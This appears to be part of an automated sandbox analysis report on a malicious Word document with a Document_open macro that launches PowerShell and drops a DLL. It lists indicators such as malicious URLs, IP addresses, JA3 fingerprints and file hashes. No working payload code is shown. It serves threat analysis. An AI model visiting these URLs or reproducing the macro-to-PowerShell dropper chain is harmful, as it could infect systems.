	MPbBCArHPF.exe	Get hash	malicious	Browse	79.98.25.1
	jjuufksfn.exe	Get hash	malicious	Browse	80.209.229.192
	wYvHbw46Xi.exe	Get hash	malicious	Browse	80.209.229.192
	2OfH3605ic.exe	Get hash	malicious	Browse	62.77.159.31
	https://bit.ly/2Ws7mjm?l=www.bancoestado.cl	Get hash	malicious	Browse	79.98.26.108
	Invoice for PO 9201072.html	Get hash	malicious	Browse	79.98.29.228
	Play_Now #U23ee#Ufe0f #U25b6#Ufe0f #U23ed#Ufe0f Nicholson.HTM	Get hash	malicious	Browse	80.209.233.68
	http.docx	Get hash	malicious	Browse	80.209.233.101
	http.docx	Get hash	malicious	Browse	80.209.233.101
	PO_#09112020.xlsx	Get hash	malicious	Browse	185.5.53.33
	XqHyunBDxl.exe	Get hash	malicious	Browse	79.98.24.39
	http://www.proco.lt/admin/infodata.php?r=bD1odHRwOi8va2FydGFzYW	Get hash	malicious	Browse	79.98.28.170
	https://diyachting.co.uk/	Get hash	malicious	Browse	194.135.87.62
	yEgeRoEgBk.exe	Get hash	malicious	Browse	79.98.24.39
	#Ud83d#Udd6aESD_NewAudioMessage.htm	Get hash	malicious	Browse	212.237.232.221
	cobaltstrike_shellcode.exe	Get hash	malicious	Browse	109.235.70.99
	haydenj235340.HTM	Get hash	malicious	Browse	89.40.4.210
TTNETTR	yVn2ywuhEC.exe	Get hash	malicious	Browse	78.182.153.125
	oHqMFmPndx.exe	Get hash	malicious	Browse	78.181.200.182
	svchost.exe	Get hash	malicious	Browse	78.162.183.87
	34ArXmP6.exe	Get hash	malicious	Browse	95.12.26.17
	1Jx5JnUZW9.exe	Get hash	malicious	Browse	95.7.8.37
	nFZB1yk7r2.exe	Get hash	malicious	Browse	95.7.8.37
	utox.exe	Get hash	malicious	Browse	78.188.107.43
	sample2.dll	Get hash	malicious	Browse	78.161.228.73
	sample1.dll	Get hash	malicious	Browse	85.105.29.218
	CA1eebsu.exe	Get hash	malicious	Browse	81.215.78.147
	form.doc	Get hash	malicious	Browse	78.188.225.105
	December Invoice.doc	Get hash	malicious	Browse	78.188.225.105
	https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/	Get hash	malicious	Browse	78.188.225.105
	https://praticideas.net/wp-content/5nxk9R7pIxOAP8bYYojGh4Rl69ZT6uMTycnblB4OUEIzYvRuc22u0pyZbSvqTNlp7/	Get hash	malicious	Browse	78.188.225.105
	MH1809380042BB.doc	Get hash	malicious	Browse	78.188.225.105
	BL9908763287SF_10.doc	Get hash	malicious	Browse	78.188.225.105
	Form.doc	Get hash	malicious	Browse	78.188.225.105
	http://creationskateboards.com/satori_wheels_spencer_hamilton/WRLUbPer/	Get hash	malicious	Browse	78.188.225.105
	http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysX	Get hash	malicious	Browse	78.188.225.105
	Nf3m8s.dll	Get hash	malicious	Browse	78.188.225.105

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	SecuriteInfo.com.Exploit.Siggen3.9634.32726.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SecuriteInfo.com.Exploit.Siggen3.9634.31858.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	attach-543652551.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	RFQ.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	1491958143547375.doc	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	aaHyijkXFm.docx	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	ABN RM753.docx	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SKM_36721012514070-2.ppt	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SecuriteInfo.com.Exploit.Siggen3.7850.19332.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SecuriteInfo.com.Exploit.Siggen3.9545.2989.doc	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SecuriteInfo.com.Exploit.Siggen3.9545.2989.doc	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	PROVA DE PAGAMENTO.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SOA - NCL INTER LOGISTICS.ppt	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	MT2001205-REX 5.25.xlsx	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	SecuriteInfo.com.Heur.3552.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	RO for 03X40HQ.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	DHL-correction.xlsx	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	EU441789083.doc	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	ORD005271444_0.doc	Get hash	malicious	Browse	177.12.170.95 35.163.191.195
	fb.xls	Get hash	malicious	Browse	177.12.170.95 35.163.191.195

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	68254_2001.doc	Get hash	malicious	Browse
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll	ARCHIVOFile-20-012021.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0510995538033594
Encrypted:	false
SSDEEP:	6:kKnLXbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Te3kPlE99SNxAhUeo+aKt
MD5:	D921AC78F8780D1E1ABCE9F0B6CA8427
SHA1:	099BE15FF9B4F3A46FBA74D9A81D4373A9B76239
SHA-256:	9420612637A3BCEDCC475CAEF8B68CCD8B94457DA560322B75B05D23D0076759
SHA-512:	9C4CF8F546FDEF2FDB6CB431FC8969B65B5FD95723CA0D7B2AC15D9E2F675389A9FCCA81CED875BC9ABFD9BB0EE4951FB0C907C2EE82AA69C1ACDE9490DBDB78
Malicious:	false
Preview:	p...... ........X..3....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	2.9820060595784836
Encrypted:	false
SSDEEP:	3:kkFklEJhM1fllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKv4fliBAIdQZV7eAYLit
MD5:	ED48972FC217DECDF53A23C26CC768E5
SHA1:	0A5319CD83546A6ABE69CEC2CE22EE69140F2257
SHA-256:	1A25B5C3B5A19348A70416E9AD63CB52491903A19902BE40AAA588B7B845E61D
SHA-512:	A13F24629F25F503EF447F2B7E479F12DBA6B6107614CBF0F66FBA03A3463901B6E6C2EA9AC756638C9C8008F1E95488D211E0B9C33C11ABEC02C31F745BDABF
Malicious:	false
Preview:	p...... ....`......3....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4A898E07-B28F-4AE5-86AD-026C320EA73C}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DB009C97-0379-4C94-9F0C-259784EC4018}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3555252507007243
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb/:IiiiiiiiiifdLloZQc8++lsJe1Mzg
MD5:	110F0264F9A92FA0ADF150487C0E01B6
SHA1:	FE892115C0169EDF8DC57B67A06271B8794EA48E
SHA-256:	C636A6A5F4D7953267F8FE2D39DE561F3840F3AB4763CB68283A1E6723E8E007
SHA-512:	2A8EBD655568E8B900D45E88DEAFF3B5C87886E1670888D19348AB6858EBF8D6926D08F179EC11E5B9C961DA3F12EC7B7CFD0EF7CF16B86FCFA4A0D8411E73CD
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabD079.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\TarD07A.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Io8ic2291n.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Feb 11 17:31:34 2021, mtime=Thu Feb 11 17:31:34 2021, atime=Thu Feb 11 17:31:36 2021, length=162816, window=hide
Category:	dropped
Size (bytes):	2028
Entropy (8bit):	4.548898303609411
Encrypted:	false
SSDEEP:	48:8Z/XT0jn4wmSCS6/A5Qh2Z/XT0jn4wmSCS6/A5Q/:8Z/XojnO45Qh2Z/XojnO45Q/
MD5:	DFE3782CD550607E14E2E4523DF36EA9
SHA1:	BDD3597AD866B3B3BC41F37F6D036D3908107585
SHA-256:	50BAAE6CFF6C115BDDACF2A586665FE253F5F42A0DCCADE577564AEA31BF1472
SHA-512:	C76640DFCC669B9A56F849D627FC06973DC87C762B799FBEEC7F8C0CE04E804CF91BB9D34B81383EDB83159F73CFA534F3295B8AF278D3D5B865363BF46B6CEE
Malicious:	false
Preview:	L..................F.... ....................>H!.....\|...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....KR...Desktop.d......QK.XKR...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..\|..KR. .IO8IC2~1.DOC..J......KR.KR....?.....................I.o.8.i.c.2.2.9.1.n...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\Io8ic2291n.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.o.8.i.c.2.2.9.1.n...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.249124798190988
Encrypted:	false
SSDEEP:	3:M1Cc6YC0Kh6YCmX1Cc6YCv:MEcuocI
MD5:	9B71815A27C3279BF9CCC343B294E360
SHA1:	8BECA8ED7AF3199160E482FC637358B4F3D64814
SHA-256:	DC05C51B8EC599E1B5757DF8DE2E41F39EB0D545F5E0028573FDB1D8695A875A
SHA-512:	6ED7FDCF0EF99E4F891B71951DD976B1663F1AA00BF989C129895D880B7F5B483D116B5E944D05966E9079F543ED492ED46A11FC1C5C04554C58F3879489E6AC
Malicious:	false
Preview:	[doc]..Io8ic2291n.LNK=0..Io8ic2291n.LNK=0..[doc]..Io8ic2291n.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G35337LWH2E05RNT3GY2.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5899122205346594
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwofz8hQCsMqaqvsEHyqvJCworZzvlYXH8f8OElUVNIu:cyzofz8ynHnorZzvTf8OdIu
MD5:	E69E57F3BC79EE1D544059BC25CBACFC
SHA1:	93D4802BDF491F71F64EEEA238D82C81190E380C
SHA-256:	FD9B154394DF4E3412AF7608F121C3C8A39CF19F83B964DD0A02B7D3AD57827A
SHA-512:	77E336CBE09D9740DAD6CBBA690A52DB878381EB71C58D240D055682DD25CF3C11BA9E6599E028EF6E25A8BBFD46FBC38B134C18E53AF213FA5D7D4F070C4722
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$8ic2291n.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	354648
Entropy (8bit):	4.29030621772406
Encrypted:	false
SSDEEP:	3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
MD5:	039810A34BE3DD45B9D30F89E18F46F4
SHA1:	5F8609A2DB33D6BB70584E1741F428245474146F
SHA-256:	A9DD98F4B6FE0B997F8B3D50F1CA405F02583A02133874FE123EAEA6C22DAB00
SHA-512:	8ACA60103958AA461A91F708E0E41A401F316161DEFE9525560AC2E03AEA3566E01F0825410E678B0C76DA7551CE48C2200D01380810CF70AC75F9CC91BCF9FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 76%, Browse Antivirus: ReversingLabs, Detection: 93%
Joe Sandbox View:	Filename: 68254_2001.doc, Detection: malicious, Browse Filename: ARCHIVOFile-20-012021.doc, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: -535, Keywords: 155, Comments: 43, Thumbnail: 21890, 0x17: 917504CDFV2 Microsoft Word
Entropy (8bit):	6.825379760273459
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	Io8ic2291n.doc
File size:	162816
MD5:	c407d761ae02cc9327c0032e12eee614
SHA1:	deaac3a40a855a36516a6a774e8f5e4683b4dca0
SHA256:	7236c54fca0b5d561a4194766f1b47882c7c44670b2a3952e1474cd4b9025214
SHA512:	d39e50c8c1f568d5655dd3afc40f22ac15fb14ecddd7b192fe33c4d8f64b1f29bb862b8d082f44f43dab06ae25c3c7fe6a0fc53a9e295e8fe7aa9d560286d5da
SSDEEP:	3072:1/X2TdcrrXyQBsc0vWJVi4IrwVqfMb27:1/PPIId27
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Io8ic2291n.doc"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Document Summary
Document Code Page:	-535
Number of Lines:	155
Number of Paragraphs:	43
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Bcur5699z4d, Stream Size: 1108

General
Stream Path:	Macros/VBA/Bcur5699z4d
VBA File Name:	Bcur5699z4d
Stream Size:	1108
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 92 a6 8c 67 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Xqcxarraokjbi
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Bcur5699z4d"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
